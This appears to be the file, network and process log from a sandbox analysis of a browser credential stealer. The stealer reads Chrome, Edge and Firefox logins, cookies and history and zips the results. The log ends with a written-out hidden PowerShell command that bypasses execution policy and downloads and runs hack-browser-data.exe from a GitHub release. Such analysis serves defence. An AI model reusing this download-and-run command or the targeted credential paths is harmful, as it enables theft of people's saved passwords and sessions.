Technical Information
- '<SYSTEM32>\taskkill.exe' /im chrome.exe /f
- %LOCALAPPDATA%\microsoft\edge\user data\default\login data
- %LOCALAPPDATA%\microsoft\edge\user data\default\web data
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %TEMP%\_mei10682\vcruntime140.dll
- %TEMP%\_mei10682\_bz2.pyd
- %TEMP%\_mei10682\_decimal.pyd
- %TEMP%\_mei10682\_hashlib.pyd
- %TEMP%\_mei10682\_lzma.pyd
- %TEMP%\_mei10682\_socket.pyd
- %TEMP%\_mei10682\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-fibers-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\_mei10682\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\_mei10682\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\_mei10682\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\_mei10682\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\_mei10682\base_library.zip
- %TEMP%\_mei10682\libcrypto-3.dll
- %TEMP%\_mei10682\python312.dll
- %TEMP%\_mei10682\select.pyd
- %TEMP%\_mei10682\ucrtbase.dll
- %TEMP%\_mei10682\unicodedata.pyd
- %HOMEPATH%\downloads\hack-browser-data.exe
- %TEMP%\history_4.temp
- %TEMP%\history_5.temp
- %TEMP%\login data_1.temp
- %TEMP%\secure preferences_9.temp
- %TEMP%\web data_6.temp
- %TEMP%\local state_0.temp
- %TEMP%\local storage\leveldb_7.temp\current
- %TEMP%\local storage\leveldb_7.temp\log
- %TEMP%\local storage\leveldb_7.temp\manifest-000001
- %TEMP%\local storage\leveldb_7.temp\manifest-000005
- %TEMP%\local storage\leveldb_7.temp\current.bak
- %TEMP%\local storage\leveldb_7.temp\current.5
- %TEMP%\local storage\leveldb_7.temp\000004.log
- %TEMP%\session storage_8.temp\current
- %TEMP%\session storage_8.temp\log
- %TEMP%\session storage_8.temp\manifest-000001
- %TEMP%\cookies_2.temp
- %TEMP%\session storage_8.temp\manifest-000005
- %TEMP%\session storage_8.temp\current.bak
- %TEMP%\session storage_8.temp\current.5
- %TEMP%\session storage_8.temp\000004.log
- %HOMEPATH%\downloads\results\chrome_default_history.csv
- %HOMEPATH%\downloads\results\chrome_default_extension.csv
- %TEMP%\places.sqlite_16.temp
- %TEMP%\places.sqlite_17.temp
- %TEMP%\webappsstore.sqlite_19.temp
- %TEMP%\cookies.sqlite_14.temp
- %TEMP%\extensions.json_21.temp
- %TEMP%\key4.db_12.temp
- %TEMP%\places.sqlite_15.temp
- %HOMEPATH%\downloads\results.zip
- %TEMP%\local state_0.temp
- %TEMP%\local storage\leveldb_7.temp\manifest-000001
- %TEMP%\local storage\leveldb_7.temp\000004.log
- %TEMP%\local storage\leveldb_7.temp\current
- %TEMP%\local storage\leveldb_7.temp\current.bak
- %TEMP%\local storage\leveldb_7.temp\log
- %TEMP%\local storage\leveldb_7.temp\manifest-000005
- %TEMP%\history_4.temp
- %TEMP%\history_5.temp
- %TEMP%\login data_1.temp
- %TEMP%\secure preferences_9.temp
- %TEMP%\web data_6.temp
- %TEMP%\session storage_8.temp\manifest-000001
- %TEMP%\session storage_8.temp\000004.log
- %TEMP%\session storage_8.temp\current
- %TEMP%\session storage_8.temp\current.bak
- %TEMP%\session storage_8.temp\log
- %TEMP%\session storage_8.temp\manifest-000005
- %TEMP%\cookies_2.temp
- %TEMP%\key4.db_12.temp
- %HOMEPATH%\downloads\results.zip
- %HOMEPATH%\downloads\results\chrome_default_extension.csv
- %HOMEPATH%\downloads\results\chrome_default_history.csv
- %HOMEPATH%\downloads\hack-browser-data.exe
- %TEMP%\_mei10682\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-fibers-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\_mei10682\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\_mei10682\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\_mei10682\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\_mei10682\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\_mei10682\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\_mei10682\base_library.zip
- %TEMP%\_mei10682\libcrypto-3.dll
- %TEMP%\_mei10682\python312.dll
- %TEMP%\_mei10682\select.pyd
- %TEMP%\_mei10682\ucrtbase.dll
- %TEMP%\_mei10682\unicodedata.pyd
- %TEMP%\_mei10682\vcruntime140.dll
- %TEMP%\_mei10682\_bz2.pyd
- %TEMP%\_mei10682\_decimal.pyd
- %TEMP%\_mei10682\_hashlib.pyd
- %TEMP%\_mei10682\_lzma.pyd
- %TEMP%\_mei10682\_socket.pyd
- from %TEMP%\local storage\leveldb_7.temp\current.5 to %TEMP%\local storage\leveldb_7.temp\current
- from %TEMP%\session storage_8.temp\current.5 to %TEMP%\session storage_8.temp\current
- %TEMP%\web data_6.temp
- %TEMP%\local state_0.temp
- %TEMP%\history_4.temp
- %TEMP%\history_5.temp
- %TEMP%\login data_1.temp
- %TEMP%\secure preferences_9.temp
- 'gi##ub.com':443
- 're#########ets.githubusercontent.com':443
- '10#.#88.167.58':5002
- 'gi##ub.com':443
- 're#########ets.githubusercontent.com':443
- DNS ASK gi##ub.com
- DNS ASK re#########ets.githubusercontent.com
- ClassName: '' WindowName: ''
- '%HOMEPATH%\downloads\hack-browser-data.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command " cd $HOME\Downloads Invoke-WebRequest -Uri \"https://github.com/christianbaiano225-eng/hack-browser-data-direct-link/releases/do...
- '%HOMEPATH%\downloads\hack-browser-data.exe' ' (with hidden window)